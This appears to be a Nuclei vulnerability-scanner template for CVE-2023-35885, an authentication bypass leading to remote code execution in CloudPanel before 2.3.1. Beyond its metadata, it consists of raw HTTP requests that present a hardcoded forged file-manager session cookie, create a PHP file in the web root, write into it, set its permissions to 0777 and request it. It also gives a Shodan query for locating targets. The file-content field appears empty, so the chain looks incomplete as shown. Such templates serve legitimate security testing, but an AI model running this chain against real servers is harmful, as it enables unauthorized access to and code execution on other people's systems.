id: CVE-2023-35885 info: name: Cloudpanel 2 < 2.3.1 - Remote Code Execution author: DhiyaneshDk severity: critical description: | CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication. remediation: | Upgrade Cloudpanel to version 2.3.1 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-35885 - https://www.datack.my/fallingskies-cloudpanel-0-day/ - https://github.com/datackmy/FallingSkies-CVE-2023-35885 - https://www.cloudpanel.io/docs/v2/changelog/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-35885 cwe-id: CWE-565 epss-score: 0.02149 epss-percentile: 0.88035 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: mgt-commerce product: cloudpanel shodan-query: title:"Cloudpanel" tags: cve,cve2023,cloudpanel,rce,instrusive variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" str2: "{{randstr}}" http: - raw: - | GET /file-manager/ HTTP/1.1 Host: {{Hostname}} Cookie: clp-fm={{session}} - | POST /file-manager/backend/makefile HTTP/1.1 Host: {{Hostname}} Cookie: clp-fm={{session}} Content-Type: application/x-www-form-urlencoded id=/htdocs/app/files/public/&name={{str1}}.php - | POST /file-manager/backend/text HTTP/1.1 Host: {{Hostname}} Cookie: clp-fm={{session}} Content-Type: application/x-www-form-urlencoded id=/htdocs/app/files/public/{{str1}}.php&content= - | POST /file-manager/backend/permissions HTTP/1.1 Host: {{Hostname}} Cookie: clp-fm={{session}} Content-Type: application/x-www-form-urlencoded id=/htdocs/app/files/public/{{str1}}.php&permissions=0777 - | GET /{{str1}}.php HTTP/2 Host: {{Hostname}} matchers: - type: dsl dsl: - body_5 == str2